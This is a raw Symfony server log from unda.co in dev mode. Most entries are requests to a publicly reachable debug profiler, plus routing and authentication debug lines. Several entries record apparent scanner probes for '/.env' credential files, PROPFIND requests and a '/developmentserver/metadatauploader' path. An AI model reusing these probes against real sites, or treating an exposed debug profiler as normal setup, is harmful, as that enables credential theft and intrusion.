  6502. [2025-12-20 07:01:00] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=events","method":"GET"} []
  6503. [2025-12-20 07:06:58] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
  6504. [2025-12-20 07:08:54] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"3259f5","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/3259f5?panel=swiftmailer","method":"GET"} []
  6505. [2025-12-20 07:08:54] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=swiftmailer","method":"GET"} []
  6506. [2025-12-20 07:19:11] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"eae15b","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/eae15b?panel=twig","method":"GET"} []
  6507. [2025-12-20 07:19:11] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=twig","method":"GET"} []
  6508. [2025-12-20 07:20:12] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"fbcff2","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/fbcff2?panel=config","method":"GET"} []
  6509. [2025-12-20 07:20:12] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=config","method":"GET"} []
  6510. [2025-12-20 07:30:32] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"a0d34b","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/a0d34b","method":"GET"} []
  6511. [2025-12-20 07:30:32] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar","method":"GET"} []
  6512. [2025-12-20 07:30:39] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"dbbcb1","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/dbbcb1","method":"GET"} []
  6513. [2025-12-20 07:30:39] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar","method":"GET"} []
  6514. [2025-12-20 07:30:40] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"7e4910","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/7e4910?panel=router","method":"GET"} []
  6515. [2025-12-20 07:30:40] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=router","method":"GET"} []
  6516. [2025-12-20 07:30:40] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"a1fd62","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/a1fd62?panel=twig","method":"GET"} []
  6517. [2025-12-20 07:30:40] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=twig","method":"GET"} []
  6518. [2025-12-20 07:30:46] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://api.unda.co/","method":"GET"} []
  6519. [2025-12-20 07:30:46] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
  6520. [2025-12-20 07:30:46] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  6521. [2025-12-20 07:30:46] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  6522. [2025-12-20 07:30:46] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
  6523. [2025-12-20 07:30:46] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
  6524. [2025-12-20 07:30:46] security.DEBUG: Calling Authentication entry point. [] []
  6525. [2025-12-20 07:31:21] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"latest","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/latest?ip=5.181.190.248&limit=10&method=GET","method":"GET"} []
  6526. [2025-12-20 07:31:21] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?ip=5.181.190.248&limit=10&method=GET","method":"GET"} []
  6527. [2025-12-20 07:31:26] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"14b2f9","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/14b2f9?panel=time","method":"GET"} []
  6528. [2025-12-20 07:31:26] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=time","method":"GET"} []
  6529. [2025-12-20 07:36:43] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"PROPFIND"} []
  6530. [2025-12-20 07:43:50] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"eae15b","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/eae15b?panel=time","method":"GET"} []
  6531. [2025-12-20 07:43:50] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=time","method":"GET"} []
  6532. [2025-12-20 07:45:14] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"106750","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/106750","method":"GET"} []
  6533. [2025-12-20 07:45:14] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar","method":"GET"} []
  6534. [2025-12-20 07:49:24] request.INFO: Matched route "_profiler_exception". {"route":"_profiler_exception","route_parameters":{"_controller":"web_profiler.controller.exception:showAction","token":"52b0f2","_route":"_profiler_exception"},"request_uri":"https://www.unda.co/_profiler/52b0f2/exception","method":"GET"} []
  6535. [2025-12-20 07:49:24] php.CRITICAL: Call to a member function getCollector() on null {"exception":"[object] (Symfony\\Component\\Debug\\Exception\\FatalThrowableError(code: 0): Call to a member function getCollector() on null at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Bundle/WebProfilerBundle/Controller/ExceptionController.php:61)"} []
  6536. [2025-12-20 07:49:24] request.CRITICAL: Uncaught PHP Exception Symfony\Component\Debug\Exception\FatalThrowableError: "Call to a member function getCollector() on null" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Bundle/WebProfilerBundle/Controller/ExceptionController.php line 61 {"exception":"[object] (Symfony\\Component\\Debug\\Exception\\FatalThrowableError(code: 0): Call to a member function getCollector() on null at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Bundle/WebProfilerBundle/Controller/ExceptionController.php:61)"} []
  6537. [2025-12-20 07:59:52] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"32d5b3","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/32d5b3?panel=form","method":"GET"} []
  6538. [2025-12-20 07:59:52] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=form","method":"GET"} []
  6539. [2025-12-20 07:59:58] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"PROPFIND"} []
  6540. [2025-12-20 08:04:54] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"55fc44","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/55fc44?panel=db","method":"GET"} []
  6541. [2025-12-20 08:04:54] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=db","method":"GET"} []
  6542. [2025-12-20 08:05:14] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"eae15b","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/eae15b?panel=security","method":"GET"} []
  6543. [2025-12-20 08:05:14] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=security","method":"GET"} []
  6544. [2025-12-20 08:05:15] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"5f0320","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/5f0320?panel=logger","method":"GET"} []
  6545. [2025-12-20 08:05:15] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=logger","method":"GET"} []
  6546. [2025-12-20 08:08:17] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"86d84d","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/86d84d","method":"GET"} []
  6547. [2025-12-20 08:08:17] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar","method":"GET"} []
  6548. [2025-12-20 08:11:21] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /developmentserver/metadatauploader"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /developmentserver/metadatauploader\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  6549. [2025-12-20 08:11:41] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"2263c2","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/2263c2?panel=config","method":"GET"} []
  6550. [2025-12-20 08:11:41] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=config","method":"GET"} []
  6551. [2025-12-20 08:13:12] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  6552. [2025-12-20 08:13:12] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  6553. [2025-12-20 08:13:13] request.INFO: Matched route "index". {"route":"index","route_parameters":{"_controller":"Hona\\LandingBundle\\Controller\\DefaultController::indexAction","_route":"index"},"request_uri":"https://unda.co/","method":"POST"} []
  6554. [2025-12-20 08:13:13] request.INFO: Matched route "hona_admin_default_index". {"route":"hona_admin_default_index","route_parameters":{"_controller":"Hona\\AdminBundle\\Controller\\DefaultController::indexAction","_route":"hona_admin_default_index"},"request_uri":"https://admin.unda.co/","method":"POST"} []
  6555. [2025-12-20 08:13:13] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"cookie_presence","authenticators":1} []
  6556. [2025-12-20 08:13:13] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
  6557. [2025-12-20 08:13:13] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
  6558. [2025-12-20 08:13:13] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
  6559. [2025-12-20 08:13:13] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
  6560. [2025-12-20 08:13:13] security.DEBUG: Calling Authentication entry point. [] []
  6561. [2025-12-20 08:13:15] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  6562. [2025-12-20 08:13:17] request.INFO: Matched route "home". {"route":"home","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\HomeController::indexAction","domain":"auth.unda.co","_route":"home"},"request_uri":"https://auth.unda.co/","method":"POST"} []
  6563. [2025-12-20 08:13:19] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  6564. [2025-12-20 08:13:21] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/","method":"POST"} []
  6565. [2025-12-20 08:13:24] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  6566. [2025-12-20 08:13:26] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://www.unda.co/","method":"POST"} []
  6567. [2025-12-20 08:13:56] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"86adc0","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/86adc0?panel=cache","method":"GET"} []
  6568. [2025-12-20 08:13:56] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=cache","method":"GET"} []
  6569. [2025-12-20 08:15:27] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  6570. [2025-12-20 08:15:30] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://ec2-35-175-10-94.compute-1.amazonaws.com/","method":"POST"} []
  6571. [2025-12-20 08:15:41] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  6572. [2025-12-20 08:15:42] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://api.unda.co/","method":"POST"} []
  6573. [2025-12-20 08:15:42] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
  6574. [2025-12-20 08:15:42] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  6575. [2025-12-20 08:15:42] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  6576. [2025-12-20 08:15:42] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
  6577. [2025-12-20 08:15:42] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
  6578. [2025-12-20 08:15:42] security.DEBUG: Calling Authentication entry point. [] []
  6579. [2025-12-20 08:19:28] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"PROPFIND"} []
  6580. [2025-12-20 08:22:46] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"63017c","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/63017c?panel=events","method":"GET"} []
  6581. [2025-12-20 08:22:46] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=events","method":"GET"} []
  6582. [2025-12-20 08:26:29] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"eae15b","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/eae15b?panel=request","method":"GET"} []
  6583. [2025-12-20 08:26:29] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=request","method":"GET"} []
  6584. [2025-12-20 08:27:17] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"eed248","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/eed248","method":"GET"} []
  6585. [2025-12-20 08:27:17] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar","method":"GET"} []
  6586. [2025-12-20 08:29:52] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"5e3cf1","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/5e3cf1?panel=cache","method":"GET"} []
  6587. [2025-12-20 08:29:52] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=cache","method":"GET"} []
  6588. [2025-12-20 08:33:17] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"latest","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/latest?panel=exception","method":"GET"} []
  6589. [2025-12-20 08:33:17] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=exception","method":"GET"} []
  6590. [2025-12-20 08:35:12] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"fbcff2","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/fbcff2","method":"GET"} []
  6591. [2025-12-20 08:35:12] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar","method":"GET"} []
  6592. [2025-12-20 08:46:59] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"eae15b","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/eae15b?panel=config","method":"GET"} []
  6593. [2025-12-20 08:46:59] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=config","method":"GET"} []
  6594. [2025-12-20 08:49:12] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"70c86d","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/70c86d?panel=swiftmailer","method":"GET"} []
  6595. [2025-12-20 08:49:12] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=swiftmailer","method":"GET"} []
  6596. [2025-12-20 08:50:19] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"latest","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/latest?ip=51.161.82.133&limit=10&method=POST","method":"GET"} []
  6597. [2025-12-20 08:50:19] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?ip=51.161.82.133&limit=10&method=POST","method":"GET"} []
  6598. [2025-12-20 08:50:36] request.INFO: Matched route "index". {"route":"index","route_parameters":{"_controller":"Hona\\LandingBundle\\Controller\\DefaultController::indexAction","_route":"index"},"request_uri":"https://unda.co/","method":"GET"} []
  6599. [2025-12-20 08:50:45] request.INFO: Matched route "hona_admin_default_index". {"route":"hona_admin_default_index","route_parameters":{"_controller":"Hona\\AdminBundle\\Controller\\DefaultController::indexAction","_route":"hona_admin_default_index"},"request_uri":"https://admin.unda.co/","method":"GET"} []
  6600. [2025-12-20 08:50:45] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"cookie_presence","authenticators":1} []
  6601. [2025-12-20 08:50:45] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
  6602. [2025-12-20 08:50:45] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
  6603. [2025-12-20 08:50:45] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
  6604. [2025-12-20 08:50:45] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
  6605. [2025-12-20 08:50:45] security.DEBUG: Calling Authentication entry point. [] []
  6606. [2025-12-20 08:50:45] request.INFO: Matched route "hona_admin_default_index". {"route":"hona_admin_default_index","route_parameters":{"_controller":"Hona\\AdminBundle\\Controller\\DefaultController::indexAction","_route":"hona_admin_default_index"},"request_uri":"https://admin.unda.co/","method":"GET"} []
  6607. [2025-12-20 08:50:45] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"cookie_presence","authenticators":1} []
  6608. [2025-12-20 08:50:45] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
  6609. [2025-12-20 08:50:45] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
  6610. [2025-12-20 08:50:45] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
